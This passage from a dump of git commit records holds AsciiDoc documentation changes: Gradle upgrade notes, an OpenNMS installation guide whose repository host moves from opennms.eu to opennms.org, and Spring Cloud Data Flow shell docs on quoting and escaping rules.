output files of `Sign` tasks are now tracked via `Signature.getToSign()` and `Signature.getFile()`, respectively.\n\n==== Collection properties default to empty collection\n\nIn Gradle 5.0, the collection property instances created using `ObjectFactory` would have no value defined, requiring plugin authors to explicitly set an initial value. This proved to be awkward and error-prone, so `ObjectFactory` now returns instances with an empty collection as their initial value.\n\n==== Worker API: working directory of a worker can no longer be set\n\nSince JDK 11 no longer supports changing the working directory of a running process, setting the working directory of a worker via its fork options is now prohibited.\nAll workers now use the same working directory to enable reuse.\nPlease pass files and directories as arguments instead. See examples in the <<custom_tasks.adoc#worker_api, Worker API documentation>>.\n\n==== Changes to native linking tasks\n\nTo expand our idiomatic <<lazy_configuration.adoc#, Provider API>> practices, the install name property from `org.gradle.nativeplatform.tasks.LinkSharedLibrary` is affected by this change.\n\n- `getInstallName()` was changed to return a `Property`.\n- `setInstallName(String)` was removed. Use `Property.set()` instead.\n\n
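Adapting to the new `Property` type is a one-line change (a sketch; the install name value is illustrative):\n\n```\ntasks.withType(org.gradle.nativeplatform.tasks.LinkSharedLibrary).configureEach {\n    \/\/ was: installName = 'libexample.so' via the removed String setter\n    installName.set('libexample.so')\n}\n```\n\n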
==== Passing arguments to Windows Resource Compiler\n\nTo expand our idiomatic <<lazy_configuration.adoc#, Provider API>> practices, the `WindowsResourceCompile` task has been converted to use the Provider API.\n\nPassing additional compiler arguments now follows the same pattern as the `CppCompile` and other tasks.\n\n==== Copied configuration no longer shares a list of `beforeResolve` actions with original\n\nThe list of `beforeResolve` actions is no longer shared between a copied configuration and the original.\nInstead, a copied configuration receives a copy of the `beforeResolve` actions at the time the copy is made.\nAny `beforeResolve` actions added after copying (to either configuration) will not be shared between the original and the copy.\nThis may break plugins that relied on the previous behaviour.\n\n==== Changes to incubating POM customization types\n\n- The type of `MavenPomDeveloper.properties` has changed from `Property<Map<String, String>>` to `MapProperty<String, String>`.\n- The type of `MavenPomContributor.properties` has changed from `Property<Map<String, String>>` to `MapProperty<String, String>`.\n\n==== Changes to specifying operating system for native projects\n\nThe incubating `operatingSystems` property on native components has been replaced with the link:{javadocPath}\/org\/gradle\/language\/cpp\/CppComponent.html#getTargetMachines()[targetMachines] property.\n\n==== Changes for archive tasks (`Zip`, `Jar`, `War`, `Ear`, `Tar`)\n\n===== Change in behavior for tasks extending `AbstractArchiveTask`\n\nThe `AbstractArchiveTask` has several new properties using the <<lazy_configuration.adoc#sec:lazy_configuration_reference,Provider API>>.\nPlugins that extend these types and override methods from the base class may no longer behave the same way.\nInternally, `AbstractArchiveTask` prefers the new properties and methods like `getArchiveName()` are fa\u00e7ades over the new properties.\n\nIf your plugin\/build only uses these types (and does not extend them), nothing has changed.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8b5be30422cda9b4a402ce2828e4a76f732472e9","subject":"HZN-185: Fix repository","message":"HZN-185: Fix repository\n\nChanged to use by default opennms.org server","repos":"aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms","old_file":"opennms-doc\/guide-install\/src\/asciidoc\/text\/opennms\/introduction.adoc","new_file":"opennms-doc\/guide-install\/src\/asciidoc\/text\/opennms\/introduction.adoc","new_contents":"\n\/\/ Allow GitHub image rendering\n:imagesdir: ..\/..\/images\n\n[[gi-basic-install-opennms]]\n== Basic Installation of OpenNMS\n\nThe _OpenNMS_ platform can be installed in several ways.\nThis guide describes the installation of the platform on _RHEL-_, _Debian-_ and _Microsoft Windows_ based operating systems.\nInstallable pre-compiled software packages are provided through _RPM_ and _Debian_ repository servers.\nRunning _OpenNMS_ requires the following components:\n\n* Internet access to download and verify installation packages from a public repository server\n* Installed <<gi-install-oracle-java, Oracle Java 8>> environment\n* PostgreSQL 9.1+ database\n* Set link to section which describes to install with RRDTool.\n  Optional link:http:\/\/oss.oetiker.ch\/rrdtool\/[RRDtool] to persist long-term performance data\n\nNOTE: _OpenJDK 8_ can be used, but for production and critical environments _Oracle Java 8_ is recommended.\n\n
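You can verify which Java runtime is currently active before installing (a generic check, not specific to _OpenNMS_):\n\n[source, shell]\n----\njava -version\n----\n\n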
NOTE: `${OPENNMS_HOME}` refers to the path _OpenNMS_ is installed to.\n      On _RHEL-based_ systems it is `\/opt\/opennms`; on _Debian-based_ systems it is `\/usr\/share\/opennms`.\n      The environment in _Microsoft Windows_ can refer to `C:\\Program Files\\opennms`.\n\nWith an _opennms_ meta package all dependencies for the components mentioned above are maintained.\nThe following sections describe how to install _OpenNMS_ on a single system.\nDependencies for _Java_ and the _PostgreSQL_ database are maintained with the _opennms_ meta installation package.\n\n[[gi-install-opennms-repo-releases]]\n=== Repositories for Releases\n\nInstallation packages are available for different releases of _OpenNMS_.\nThe configuration of the repository decides which _OpenNMS_ release will be installed.\n\nThe following releases are available to be installed:\n\n._OpenNMS_ release name convention\n[options=\"header, autowidth\"]\n|===\n| Release                    | Description\n| `stable`                   | Latest stable release\n| `testing`                  | Release candidate for next stable\n| `snapshot`                 | Latest successful develop build\n| `branches\/${BRANCH-NAME}`  | Install from a specific branch name, e.g. `branches\/features-newts` installs the repository for the _Newts_ development branch.\n                               Branches can be found in http:\/\/yum.opennms.org\/branches\/ or http:\/\/debian.opennms.org\/dists\/branches\/\n| `branches\/${RELEASE}`      | Install a specific release, e.g. `branches\/release-14.0.3`.\n                               These release branches are also found in http:\/\/yum.opennms.org\/branches\/ or http:\/\/debian.opennms.org\/dists\/branches\/\n|===\n\nTo install a different release the repository files have to be installed and manually modified.\n\n==== Specific Release on RHEL-based system\n\n.Installation of release specific repositories\n[source, shell]\n----\nrpm -Uvh http:\/\/yum.opennms.org\/repofiles\/opennms-repo-${RELEASE}-rhel7.noarch.rpm<1>\nrpm --import http:\/\/yum.opennms.org\/OPENNMS-GPG-KEY\n----\n\n<1> Replace `${RELEASE}` with a release name like `testing` or `snapshot`.\n\nInstall _OpenNMS_ with _YUM_ following the normal installation procedure.\n\n.Installation of the full _OpenNMS_ application with all dependencies\n[source, shell]\n----\nyum install opennms\n----\n\nTIP: Verify the release of _OpenNMS_ packages with `yum info opennms`.\n\n==== Specific Release on Debian-based system\n\nCreate a new apt source file (e.g. `\/etc\/apt\/sources.list.d\/opennms.list`), and add the following 2 lines:\n\n.Package repository configuration for Debian-based systems\n[source, shell]\n----\ndeb http:\/\/debian.opennms.org ${RELEASE} main <1>\ndeb-src http:\/\/debian.opennms.org ${RELEASE} main <1>\n----\n\n<1> Replace `${RELEASE}` with a release name like `testing` or `snapshot`.\n\nImport the packages' authentication key with the following command:\n\n.GPG key import for Debian-based systems\n[source, shell]\n----\nwget -O - http:\/\/debian.opennms.org\/OPENNMS-GPG-KEY | apt-key add -\n----\n\nRun `apt-get update` and install _OpenNMS_ with _apt_ following the normal installation procedure.\n\nTIP: Verify the release of _OpenNMS_ packages with `apt-cache show opennms`.\n","old_contents":"\n\/\/ Allow GitHub image rendering\n:imagesdir: ..\/..\/images\n\n[[gi-basic-install-opennms]]\n== Basic Installation of OpenNMS\n\nThe _OpenNMS_ platform can be installed in several ways.\nThis guide describes the installation of the platform on _RHEL-_, _Debian-_ and _Microsoft Windows_ based operating systems.\nInstallable pre-compiled software packages are provided through _RPM_ and _Debian_ repository servers.\n
Running _OpenNMS_ requires the following components:\n\n* Internet access to download and verify installation packages from a public repository server\n* Installed <<gi-install-oracle-java, Oracle Java 8>> environment\n* PostgreSQL 9.1+ database\n* Set link to section which describes to install with RRDTool.\n  Optional link:http:\/\/oss.oetiker.ch\/rrdtool\/[RRDtool] to persist long-term performance data\n\nNOTE: _OpenJDK 8_ can be used, but for production and critical environments _Oracle Java 8_ is recommended.\n\nNOTE: `${OPENNMS_HOME}` refers to the path _OpenNMS_ is installed to.\n      On _RHEL-based_ systems it is `\/opt\/opennms`; on _Debian-based_ systems it is `\/usr\/share\/opennms`.\n      The environment in _Microsoft Windows_ can refer to `C:\\Program Files\\opennms`.\n\nWith an _opennms_ meta package all dependencies for the components mentioned above are maintained.\nThe following sections describe how to install _OpenNMS_ on a single system.\nDependencies for _Java_ and the _PostgreSQL_ database are maintained with the _opennms_ meta installation package.\n\n[[gi-install-opennms-repo-releases]]\n=== Repositories for Releases\n\nInstallation packages are available for different releases of _OpenNMS_.\nThe configuration of the repository decides which _OpenNMS_ release will be installed.\n\nThe following releases are available to be installed:\n\n._OpenNMS_ release name convention\n[options=\"header, autowidth\"]\n|===\n| Release                    | Description\n| `stable`                   | Latest stable release\n| `testing`                  | Release candidate for next stable\n| `snapshot`                 | Latest successful develop build\n| `branches\/${BRANCH-NAME}`  | Install from a specific branch name, e.g. `branches\/features-newts` installs the repository for the _Newts_ development branch.\n                               Branches can be found in http:\/\/yum.opennms.org\/branches\/ or http:\/\/debian.opennms.org\/dists\/branches\/\n| `branches\/${RELEASE}`      | Install a specific release, e.g. 
`branches\/release-14.0.3`.\n This release branches are also found in http:\/\/yum.opennms.org\/branches\/ or http:\/\/debian.opennms.org\/dists\/branches\/\n|===\n\nTo install a different release the repository files have to be installed and manually modified.\n\n==== Specific Release on RHEL-based system\n\n.Installation of release specific repositories\n[source, shell]\n----\nrpm -Uvh http:\/\/yum.opennms.org\/repofiles\/opennms-repo-${RELEASE}-rhel7.noarch.rpm<1>\nrpm --import http:\/\/yum.opennms.org\/OPENNMS-GPG-KEY\n----\n\n<1> Replace `${RELEASE}` with a release name like `testing` or `snapshot`.\n\nInstall _OpenNMS_ with _YUM_ following the normal installation procedure.\n\n.Installation of the full _OpenNMS_ application with all dependencies\n[source, shell]\n----\nyum install opennms\n----\n\nTIP: Verify the release of _OpenNMS_ packages with `yum info opennms`.\n\n==== Specific Release on Debian-based system\n\nCreate a new apt source file (eg: `\/etc\/apt\/sources.list.d\/opennms.list`), and add the following 2 lines:\n\n.Package repository configuration for Debian-based systems\n[source, shell]\n----\ndeb http:\/\/debian.opennms.eu ${RELEASE} main <1>\ndeb-src http:\/\/debian.opennms.eu ${RELEASE} main <1>\n----\n\n<1> Replace `${RELEASE}` with a release name like `testing` or `snapshot`.\n\nImport the packages' authentication key with the following command:\n\n.GPG key import for Debian-based systems\n[source, shell]\n----\nwget -O - http:\/\/debian.opennms.eu\/OPENNMS-GPG-KEY | apt-key add -\n----\n\nRun `apt-get update`and install _OpenNMS_ with _apt_ following the normal installation procedure.\n\nTIP: Verify the release of _OpenNMS_ packages with `apt-cache show opennms`.\n","returncode":0,"stderr":"","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"ca35c53106a40b4c8a16f69a7146ced1d3a64df2","subject":"Extend the escape and quoting rules","message":"Extend the escape and quoting rules\n","repos":"spring-cloud\/spring-cloud-data,jvalkeal\/spring-cloud-dataflow,jvalkeal\/spring-cloud-data,trisberg\/spring-cloud-dataflow,cppwfs\/spring-cloud-dataflow,jvalkeal\/spring-cloud-data,jvalkeal\/spring-cloud-dataflow,ilayaperumalg\/spring-cloud-dataflow,ghillert\/spring-cloud-dataflow,cppwfs\/spring-cloud-dataflow,trisberg\/spring-cloud-dataflow,spring-cloud\/spring-cloud-dataflow,spring-cloud\/spring-cloud-dataflow,spring-cloud\/spring-cloud-data,markfisher\/spring-cloud-dataflow,cppwfs\/spring-cloud-dataflow,markfisher\/spring-cloud-data,ilayaperumalg\/spring-cloud-dataflow,mminella\/spring-cloud-data,markpollack\/spring-cloud-dataflow,spring-cloud\/spring-cloud-dataflow,markfisher\/spring-cloud-dataflow,ilayaperumalg\/spring-cloud-dataflow,jvalkeal\/spring-cloud-dataflow,mminella\/spring-cloud-data,markfisher\/spring-cloud-dataflow,markfisher\/spring-cloud-data,markpollack\/spring-cloud-dataflow,spring-cloud\/spring-cloud-dataflow,ghillert\/spring-cloud-dataflow,spring-cloud\/spring-cloud-data,jvalkeal\/spring-cloud-data,markpollack\/spring-cloud-dataflow,markfisher\/spring-cloud-data,jvalkeal\/spring-cloud-dataflow,trisberg\/spring-cloud-dataflow,markfisher\/spring-cloud-dataflow,jvalkeal\/spring-cloud-dataflow,trisberg\/spring-cloud-dataflow,spring-cloud\/spring-cloud-dataflow","old_file":"spring-cloud-dataflow-docs\/src\/main\/asciidoc\/shell.adoc","new_file":"spring-cloud-dataflow-docs\/src\/main\/asciidoc\/shell.adoc","new_contents":"[[shell]]\n= Shell\n\n[partintro]\n--\nThis section covers the options for starting the shell and more advanced functionality relating to how 
the shell handles white spaces, quotes, and interpretation of SpEL expressions.\nThe introductory chapters to the\n<<spring-cloud-dataflow-stream-intro, Stream DSL>> and <<spring-cloud-dataflow-composed-tasks, Composed Task DSL>> are good places to start for the most common usage of shell commands.\n--\n\n[[shell-options]]\n== Shell Options\nThe shell is built upon the link:https:\/\/projects.spring.io\/spring-shell\/[Spring Shell] project.\nThere are command line options generic to Spring Shell and some specific to Data Flow.\nThe shell takes the following command line options\n\n[source,bash,options=\"nowrap\",subs=attributes]\n----\nunix:>java -jar spring-cloud-dataflow-shell-{project-version}.jar --help\nData Flow Options:\n --dataflow.uri=<uri> Address of the Data Flow Server [default: http:\/\/localhost:9393].\n --dataflow.username=<USER> Username of the Data Flow Server [no default].\n --dataflow.password=<PASSWORD> Password of the Data Flow Server [no default].\n --dataflow.credentials-provider-command=<COMMAND> Executes an external command which must return an\n OAuth Bearer Token (Access Token prefixed with 'Bearer '),\n e.g. 'Bearer 12345'), [no default].\n --dataflow.skip-ssl-validation=<true|false> Accept any SSL certificate (even self-signed) [default: no].\n --dataflow.proxy.uri=<PROXY-URI> Address of an optional proxy server to use [no default].\n --dataflow.proxy.username=<PROXY-USERNAME> Username of the proxy server (if required by proxy server) [no default].\n --dataflow.proxy.password=<PROXY-PASSWORD> Password of the proxy server (if required by proxy server) [no default].\n --spring.shell.historySize=<SIZE> Default size of the shell log file [default: 3000].\n --spring.shell.commandFile=<FILE> Data Flow Shell executes commands read from the file(s) and then exits.\n --help This message.\n----\n\nThe `spring.shell.commandFile` option can be used to point to an existing file that contains\nall the shell commands to deploy one or many related streams and tasks. This is useful when creating some scripts to\nhelp automate deployment.\n\nAlso, the following shell command helps to modularize a complex script into multiple independent files:\n\n`dataflow:>script --file <YOUR_AWESOME_SCRIPT>`\n\n[[shell-commands]]\n== Listing Available Commands\n\nTyping `help` at the command prompt gives a listing of all available commands.\nMost of the commands are for Data Flow functionality, but a few are general purpose.\n[source,bash]\n----\n! - Allows execution of operating system (OS) commands\nclear - Clears the console\ncls - Clears the console\ndate - Displays the local date and time\nexit - Exits the shell\nhttp get - Make GET request to http endpoint\nhttp post - POST data to http endpoint\nquit - Exits the shell\nsystem properties - Shows the shell's properties\nversion - Displays shell version\n----\n\nAdding the name of the command to `help` shows additional information on how to invoke the command.\n[source,bash]\n----\ndataflow:>help stream create\nKeyword: stream create\nDescription: Create a new stream definition\n Keyword: ** default **\n Keyword: name\n Help: the name to give to the stream\n Mandatory: true\n Default if specified: '__NULL__'\n Default if unspecified: '__NULL__'\n\n Keyword: definition\n Help: a stream definition, using the DSL (e.g. 
\"http --port=9000 | hdfs\")\n Mandatory: true\n Default if specified: '__NULL__'\n Default if unspecified: '__NULL__'\n\n Keyword: deploy\n Help: whether to deploy the stream immediately\n Mandatory: false\n Default if specified: 'true'\n Default if unspecified: 'false'\n----\n\n[[shell-tab-completion]]\n== Tab Completion\n\nThe shell command options can be completed in the shell by pressing the `TAB` key after the leading `--`. For example, pressing `TAB` after `stream create --` results in\n```\ndataflow:>stream create --\nstream create --definition stream create --name\n```\n\nIf you type `--de` and then hit tab, `--definition` will be expanded.\n\nTab completion is also available inside the stream or composed task DSL expression for application or task properties. You can also use `TAB` to get hints in a stream DSL expression for what available sources, processors, or sinks can be used.\n\n[[shell-white-space]]\n== White Space and Quoting Rules\n\nIt is only necessary to quote parameter values if they contain spaces or the `|` character. The following example passes a SpEL expression (which is applied to any data it encounters) to a transform processor:\n\n`transform --expression='new StringBuilder(payload).reverse()'`\n\nIf the parameter value needs to embed a single quote, use two single quotes, as follows:\n\n[source]\n\/\/ Query is: Select * from \/Customers where name='Smith'\nscan --query='Select * from \/Customers where name=''Smith'''\n\n\n[[dsl-quotes-escaping]]\n=== Quotes and Escaping\n\nThere is a Spring Shell-based client that talks to the Data Flow Server and is responsible for *parsing* the DSL.\nIn turn, applications may have applications properties that rely on embedded languages, such as the *Spring Expression Language*.\n\nThe shell, Data Flow DSL parser, and SpEL have rules about how they handle quotes and how syntax escaping works.\nWhen combined together, confusion may arise.\nThis section explains the rules that apply and provides examples of the most complicated situations you may encounter when all three components are involved.\n\n[NOTE]\n.It's not always that complicated\n====\nIf you do not use the Data Flow shell (for example, you use the REST API directly) or if application properties are not SpEL expressions, then the escaping rules are simpler.\n====\n\n==== Shell rules\nArguably, the most complex component when it comes to quotes is the shell. The rules can be laid out quite simply, though:\n\n* A shell command is made of keys (`--something`) and corresponding values. There is a special, keyless mapping, though, which is described later.\n* A value cannot normally contain spaces, as space is the default delimiter for commands.\n* Spaces can be added though, by surrounding the value with quotes (either single (`'`) or double (`\"`) quotes).\n* Values passed inside deployment properties (e.g. `deployment <stream-name> --properties \" ...\"`) should not be quoted again.\n* If surrounded with quotes, a value can embed a literal quote of the same kind by prefixing it with a backslash (`\\`).\n* Other escapes are available, such as `\\t`, `\\n`, `\\r`, `\\f` and unicode escapes of the form `\\uxxxx`.\n* The keyless mapping is handled in a special way such that it does not need quoting to contain spaces.\n\nFor example, the shell supports the `!` command to execute native shell commands. The `!` accepts a single keyless argument. This is why the following works:\n----\ndataflow:>! 
As another example, the following commands are strictly equivalent, and the argument value is `something` (without the quotes):\n----\ndataflow:>stream destroy something\ndataflow:>stream destroy --name something\ndataflow:>stream destroy \"something\"\ndataflow:>stream destroy --name \"something\"\n----\n\n==== Property file rules\nRules are relaxed when loading the properties from files.\n\n* The special characters used in property files (both Java and YAML) need to be escaped. For example `\\` should be replaced by `\\\\`, `\\t` by `\\\\t` and so forth.\n* For Java property files (`--propertiesFile <FILE_PATH>.properties`) the property values should not be surrounded by quotes! Quotes are not needed even if the values contain spaces.\n----\nfilter.expression=payload > 5\n----\n* For YAML property files (`--propertiesFile <FILE_PATH>.yaml`), though, the values need to be surrounded by double quotes.\n----\napp:\n    filter:\n        filter:\n            expression: \"payload > 5\"\n----\n\n==== DSL Parsing Rules\nAt the parser level (that is, inside the body of a stream or task definition) the rules are as follows:\n\n* Option values are normally parsed until the first space character.\n* They can be made of literal strings, though, surrounded by single or double quotes.\n* To embed such a quote, use two consecutive quotes of the desired kind.\n\nAs such, the values of the `--expression` option to the filter application are semantically equivalent in the following examples:\n----\nfilter --expression=payload>5\nfilter --expression=\"payload>5\"\nfilter --expression='payload>5'\nfilter --expression='payload > 5'\n----\n\nArguably, the last one is more readable. It is made possible thanks to the surrounding quotes. The actual expression is `payload > 5` (without quotes).\n\nNow, imagine that we want to test against string messages. If we want to compare the payload to the SpEL literal string, `\"something\"`, we could use the following:\n----\nfilter --expression=payload=='something'           <1>\nfilter --expression='payload == ''something'''     <2>\nfilter --expression='payload == \"something\"'       <3>\n----\n<1> This works because there are no spaces. It is not very legible, though.\n<2> This uses single quotes to protect the whole argument. Hence, the actual single quotes need to be doubled.\n<3> SpEL recognizes String literals with either single or double quotes, so this last method is arguably the most readable.\n\nPlease note that the preceding examples are to be considered outside of the shell (for example, when calling the REST API directly).\nWhen entered inside the shell, chances are that the whole stream definition is itself inside double quotes, which would need to be escaped. The whole example then becomes the following:\n----\ndataflow:>stream create something --definition \"http | filter --expression=payload='something' | log\"\n\ndataflow:>stream create something --definition \"http | filter --expression='payload == ''something''' | log\"\n\ndataflow:>stream create something --definition \"http | filter --expression='payload == \\\"something\\\"' | log\"\n----\n\n==== SpEL Syntax and SpEL Literals\nThe last piece of the puzzle is about SpEL expressions.\nMany applications accept options that are to be interpreted as SpEL expressions, and, as seen above, String literals are handled in a special way there, too. 
\n==== DSL Parsing Rules\nAt the parser level (that is, inside the body of a stream or task definition) the rules are as follows:\n\n* Option values are normally parsed until the first space character.\n* They can be made of literal strings, though, surrounded by single or double quotes.\n* To embed such a quote, use two consecutive quotes of the desired kind.\n\nAs such, the values of the `--expression` option to the filter application are semantically equivalent in the following examples:\n----\nfilter --expression=payload>5\nfilter --expression=\"payload>5\"\nfilter --expression='payload>5'\nfilter --expression='payload > 5'\n----\n\nArguably, the last one is more readable. It is made possible thanks to the surrounding quotes. The actual expression is `payload > 5` (without quotes).\n\nNow, imagine that we want to test against string messages. If we want to compare the payload to the SpEL literal string `\"something\"`, we could use the following:\n----\nfilter --expression=payload=='something' <1>\nfilter --expression='payload == ''something''' <2>\nfilter --expression='payload == \"something\"' <3>\n----\n<1> This works because there are no spaces. It is not very legible, though.\n<2> This uses single quotes to protect the whole argument. Hence, the actual single quotes need to be doubled.\n<3> SpEL recognizes String literals with either single or double quotes, so this last method is arguably the most readable.\n\nPlease note that the preceding examples are to be considered outside of the shell (for example, when calling the REST API directly).\nWhen entered inside the shell, chances are that the whole stream definition is itself inside double quotes, which would need to be escaped. The whole example then becomes the following:\n----\ndataflow:>stream create something --definition \"http | filter --expression=payload=='something' | log\"\n\ndataflow:>stream create something --definition \"http | filter --expression='payload == ''something''' | log\"\n\ndataflow:>stream create something --definition \"http | filter --expression='payload == \\\"something\\\"' | log\"\n----\n\n==== SpEL Syntax and SpEL Literals\nThe last piece of the puzzle is about SpEL expressions.\nMany applications accept options that are to be interpreted as SpEL expressions and, as seen above, String literals are handled in a special way there, too. The rules are as follows:\n\n* Literals can be enclosed in either single or double quotes.\n* Quotes need to be doubled to embed a literal quote. Single quotes inside double quotes need no special treatment, and the reverse is also true.\n\nAs a last example, assume you want to use the link:${scs-app-starters-docs}\/spring-cloud-stream-modules-processors.html#spring-clound-stream-modules-transform-processor[transform processor].\nThis processor accepts an `expression` option, which is a SpEL expression. It is evaluated against the incoming message, with a default of `payload` (which forwards the message payload untouched).\n\nIt is important to understand that the following statements are equivalent:\n----\ntransform --expression=payload\ntransform --expression='payload'\n----\n\nHowever, they are different from the following (and variations upon them):\n----\ntransform --expression=\"'payload'\"\ntransform --expression='''payload'''\n----\n\nThe first series evaluates to the message payload, while the latter examples evaluate to the literal string `payload` (again, without quotes).\n\n==== Putting It All Together\nAs a last, complete example, consider how one could force the transformation of all messages to the string literal `hello world` by creating a stream in the context of the Data Flow shell:\n\/\/ asciidoctor note: callouts don't work here, they mess up the TOC for some reason\n----\ndataflow:>stream create something --definition \"http | transform --expression='''hello world''' | log\" <1>\n\ndataflow:>stream create something --definition \"http | transform --expression='\\\"hello world\\\"' | log\" <2>\n\ndataflow:>stream create something --definition \"http | transform --expression=\\\"'hello world'\\\" | log\" <2>\n----\n<1> In the first line, there are single quotes around the string (at the Data Flow parser level), but they need to be doubled because they are inside a string literal (started by the first single quote after the equals sign).\n<2> The second and third lines use single and double quotes, respectively, to encompass the whole string at the Data Flow parser level. Consequently, the other kind of quote can be used inside the string. The whole thing is inside the `--definition` argument to the shell, though, which uses double quotes. Consequently, double quotes are escaped (at the shell level).\n
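\nTo check the result (a sketch that assumes the `http` source listens on port 9000, as in the earlier `http --port=9000` example; adjust the port to your deployment), you can post any message to the stream with the shell's `http post` command. The log sink then shows `hello world` regardless of the posted payload:\n----\ndataflow:>http post --target http:\/\/localhost:9000 --data \"anything\"\n----\n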
","old_contents":"[[shell]]\n= Shell\n\n[partintro]\n--\nThis section covers the options for starting the shell and more advanced functionality relating to how the shell handles white spaces, quotes, and interpretation of SpEL expressions.\nThe introductory chapters to the\n<<spring-cloud-dataflow-stream-intro, Stream DSL>> and <<spring-cloud-dataflow-composed-tasks, Composed Task DSL>> are good places to start for the most common usage of shell commands.\n--\n\n[[shell-options]]\n== Shell Options\nThe shell is built upon the link:https:\/\/projects.spring.io\/spring-shell\/[Spring Shell] project.\nThere are command line options generic to Spring Shell and some specific to Data Flow.\nThe shell takes the following command line options\n\n[source,bash,options=\"nowrap\",subs=attributes]\n----\nunix:>java -jar spring-cloud-dataflow-shell-{project-version}.jar --help\nData Flow Options:\n --dataflow.uri=<uri> Address of the Data Flow Server [default: http:\/\/localhost:9393].\n --dataflow.username=<USER> Username of the Data Flow Server [no default].\n --dataflow.password=<PASSWORD> Password of the Data Flow Server [no default].\n --dataflow.credentials-provider-command=<COMMAND> Executes an external command which must return an\n OAuth Bearer Token (Access Token prefixed with 'Bearer '),\n e.g. 'Bearer 12345'), [no default].\n --dataflow.skip-ssl-validation=<true|false> Accept any SSL certificate (even self-signed) [default: no].\n --dataflow.proxy.uri=<PROXY-URI> Address of an optional proxy server to use [no default].\n --dataflow.proxy.username=<PROXY-USERNAME> Username of the proxy server (if required by proxy server) [no default].\n --dataflow.proxy.password=<PROXY-PASSWORD> Password of the proxy server (if required by proxy server) [no default].\n --spring.shell.historySize=<SIZE> Default size of the shell log file [default: 3000].\n --spring.shell.commandFile=<FILE> Data Flow Shell executes commands read from the file(s) and then exits.\n --help This message.\n----\n\nThe `spring.shell.commandFile` option can be used to point to an existing file that contains\nall the shell commands to deploy one or many related streams and tasks. This is useful when creating some scripts to\nhelp automate deployment.\n\nAlso, the following shell command helps to modularize a complex script into multiple independent files:\n\n`dataflow:>script --file <YOUR_AWESOME_SCRIPT>`\n\n[[shell-commands]]\n== Listing Available Commands\n\nTyping `help` at the command prompt gives a listing of all available commands.\nMost of the commands are for Data Flow functionality, but a few are general purpose.\n[source,bash]\n----\n! - Allows execution of operating system (OS) commands\nclear - Clears the console\ncls - Clears the console\ndate - Displays the local date and time\nexit - Exits the shell\nhttp get - Make GET request to http endpoint\nhttp post - POST data to http endpoint\nquit - Exits the shell\nsystem properties - Shows the shell's properties\nversion - Displays shell version\n----\n\nAdding the name of the command to `help` shows additional information on how to invoke the command.\n[source,bash]\n----\ndataflow:>help stream create\nKeyword: stream create\nDescription: Create a new stream definition\n Keyword: ** default **\n Keyword: name\n Help: the name to give to the stream\n Mandatory: true\n Default if specified: '__NULL__'\n Default if unspecified: '__NULL__'\n\n Keyword: definition\n Help: a stream definition, using the DSL (e.g.
\"http --port=9000 | hdfs\")\n Mandatory: true\n Default if specified: '__NULL__'\n Default if unspecified: '__NULL__'\n\n Keyword: deploy\n Help: whether to deploy the stream immediately\n Mandatory: false\n Default if specified: 'true'\n Default if unspecified: 'false'\n----\n\n[[shell-tab-completion]]\n== Tab Completion\n\nThe shell command options can be completed in the shell by pressing the `TAB` key after the leading `--`. For example, pressing `TAB` after `stream create --` results in\n```\ndataflow:>stream create --\nstream create --definition stream create --name\n```\n\nIf you type `--de` and then hit tab, `--definition` will be expanded.\n\nTab completion is also available inside the stream or composed task DSL expression for application or task properties. You can also use `TAB` to get hints in a stream DSL expression for what available sources, processors, or sinks can be used.\n\n[[shell-white-space]]\n== White Space and Quoting Rules\n\nIt is only necessary to quote parameter values if they contain spaces or the `|` character. The following example passes a SpEL expression (which is applied to any data it encounters) to a transform processor:\n\n`transform --expression='new StringBuilder(payload).reverse()'`\n\nIf the parameter value needs to embed a single quote, use two single quotes, as follows:\n\n[source]\n\/\/ Query is: Select * from \/Customers where name='Smith'\nscan --query='Select * from \/Customers where name=''Smith'''\n\n\n[[dsl-quotes-escaping]]\n=== Quotes and Escaping\n\nThere is a Spring Shell-based client that talks to the Data Flow Server and is responsible for *parsing* the DSL.\nIn turn, applications may have applications properties that rely on embedded languages, such as the *Spring Expression Language*.\n\nThe shell, Data Flow DSL parser, and SpEL have rules about how they handle quotes and how syntax escaping works.\nWhen combined together, confusion may arise.\nThis section explains the rules that apply and provides examples of the most complicated situations you may encounter when all three components are involved.\n\n[NOTE]\n.It's not always that complicated\n====\nIf you do not use the Data Flow shell (for example, you use the REST API directly) or if application properties are not SpEL expressions, then the escaping rules are simpler.\n====\n\n==== Shell rules\nArguably, the most complex component when it comes to quotes is the shell. The rules can be laid out quite simply, though:\n\n* A shell command is made of keys (`--something`) and corresponding values. There is a special, keyless mapping, though, which is described later.\n* A value cannot normally contain spaces, as space is the default delimiter for commands.\n* Spaces can be added though, by surrounding the value with quotes (either single (`'`) or double (`\"`) quotes).\n* If surrounded with quotes, a value can embed a literal quote of the same kind by prefixing it with a backslash (`\\`).\n* Other escapes are available, such as `\\t`, `\\n`, `\\r`, `\\f` and unicode escapes of the form `\\uxxxx`.\n* The keyless mapping is handled in a special way such that it does not need quoting to contain spaces.\n\nFor example, the shell supports the `!` command to execute native shell commands. The `!` accepts a single keyless argument. This is why the following works:\n----\ndataflow:>! 
rm something\n----\nThe argument here is the whole `rm something` string, which is passed as is to the underlying shell.\n\nAs another example, the following commands are strictly equivalent, and the argument value is `something` (without the quotes):\n----\ndataflow:>stream destroy something\ndataflow:>stream destroy --name something\ndataflow:>stream destroy \"something\"\ndataflow:>stream destroy --name \"something\"\n----\n\n\n==== DSL Parsing Rules\nAt the parser level (that is, inside the body of a stream or task definition) the rules are as follows:\n\n* Option values are normally parsed until the first space character.\n* They can be made of literal strings, though, surrounded by single or double quotes.\n* To embed such a quote, use two consecutive quotes of the desired kind.\n\nAs such, the values of the `--expression` option to the filter application are semantically equivalent in the following examples:\n----\nfilter --expression=payload>5\nfilter --expression=\"payload>5\"\nfilter --expression='payload>5'\nfilter --expression='payload > 5'\n----\n\nArguably, the last one is more readable. It is made possible thanks to the surrounding quotes. The actual expression is `payload > 5` (without quotes).\n\nNow, imagine that we want to test against string messages. If we want to compare the payload to the SpEL literal string, `\"something\"`, we could use the following:\n----\nfilter --expression=payload=='something' <1>\nfilter --expression='payload == ''something''' <2>\nfilter --expression='payload == \"something\"' <3>\n----\n<1> This works because there are no spaces. It is not very legible, though.\n<2> This uses single quotes to protect the whole argument. Hence, the actual single quotes need to be doubled.\n<3> SpEL recognizes String literals with either single or double quotes, so this last method is arguably the most readable.\n\nPlease note that the preceding examples are to be considered outside of the 